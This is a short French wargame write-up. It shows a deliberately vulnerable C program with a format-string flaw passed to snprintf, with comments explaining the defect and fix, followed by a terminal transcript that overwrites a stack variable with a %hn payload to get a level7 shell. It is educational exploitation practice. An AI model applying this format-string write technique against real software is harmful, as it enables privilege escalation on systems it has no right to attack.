OMG ! Encore !
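Ouais... Ben là, c'est juste encore pour préciser que j'adore exploiter ce genre de failles sur les box :) Ici, c'est une faille de type « format string » : argv[1] est passé tel quel comme chaîne de format à snprintf.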
#include <stdio.h>
#include <string.h>
/*
 * Wargame "level6" target: a deliberately vulnerable program.
 *
 * It formats argv[1] into a 64-byte stack buffer, then calls seteuid(1007)
 * and spawns /bin/sh only if the local `i` equals 500. Nothing in the
 * program assigns to `i` after its initialisation, so that branch is
 * reachable only if memory is corrupted.
 *
 * Defect (CWE-134, uncontrolled format string): argv[1] is passed as the
 * format argument of snprintf() instead of as data. The fix is
 *     snprintf(buffer, sizeof buffer, "%s", argv[1]);
 * and building with -Wformat -Wformat-security reports this call at
 * compile time.
 *
 * NOTE(review): seteuid() and system() are declared in <unistd.h> and
 * <stdlib.h>; this listing includes only <stdio.h> and <string.h>.
 *
 * Always returns 0.
 */
int main(int argc, char **argv){
int i = 1; /* guard value; never written by the program's own logic */
char buffer[64];
/*
 * NOTE(review): argc is never checked, so argv[1] is NULL when the program
 * is run without an argument.
 *
 * Caller-controlled format string. The size argument only bounds the bytes
 * stored in buffer; conversion specifiers found in argv[1] are still
 * interpreted, with no matching variadic arguments supplied by this call.
 */
snprintf(buffer, sizeof buffer, argv[1]);
buffer[sizeof (buffer) - 1] = 0; /* redundant: snprintf NUL-terminates when size > 0 */
printf("Change i's value from 1 -> 500. ");
if(i==500){
printf("GOOD\n");
/*
 * The return value of seteuid() is not checked, so a failed identity change
 * would go unnoticed. In the transcript on this page the resulting shell
 * reports level7; presumably uid 1007 is that account -- confirm.
 */
seteuid(1007);
system("/bin/sh"); /* interactive shell; execution continues below once it exits */
}
printf("No way...let me give you a hint!\n");
/* strlen() returns size_t but the specifier is %d (int); %zu is the matching one. */
printf("buffer : [%s] (%d)\n", buffer, strlen(buffer));
/*
 * The "hint": prints the stack address of `i`. Outside a training target,
 * disclosing addresses like this weakens ASLR. %p expects a void pointer;
 * &i is passed as int pointer without a cast.
 */
printf ("i = %d (%p)\n", i, &i);
return 0;
}
level6@0xtcebBox:whoami
level6
level6@0xtcebBox:/wargame$ ./level6 hello
Change i's value from 1 -> 500. No way...let me give you a hint!
buffer : [hello] (5)
i = 1 (0xbffffa5c)
level6@0xtcebBox:/wargame$ ./level6 %08x
Change i's value from 1 -> 500. No way...let me give you a hint!
buffer : [0177ff8e] (8)
i = 1 (0xbffffa5c)
level6@0xtcebBox:/wargame$ ./level6 `python -c "print 'aaaa'+'.%08x'*15"`
Change i's value from 1 -> 500. No way...let me give you a hint!
buffer : [aaaa.0177ff8e.01000000.00000000.28000000.656e6f6e.61616161.3731] (63)
i = 1 (0xbffffa0c)
level6@0xtcebBox:/wargame$ ./level6 `python -c "print 'aaaa'+'%.496u'+'%6\x24x'"`
Change i's value from 1 -> 500. No way...let me give you a hint!
buffer : [aaaa00000000000000000000000000000000000000000000000000000000000] (63)
i = 1 (0xbffffa4c)
level6@0xtcebBox:/wargame$ ./level6 `python -c "print '\x4c\xfa\xff\xbf'+'%.496u'+'%6\x24hn'"`
Change i's value from 1 -> 500. GOOD
sh-3.1$ whoami
level7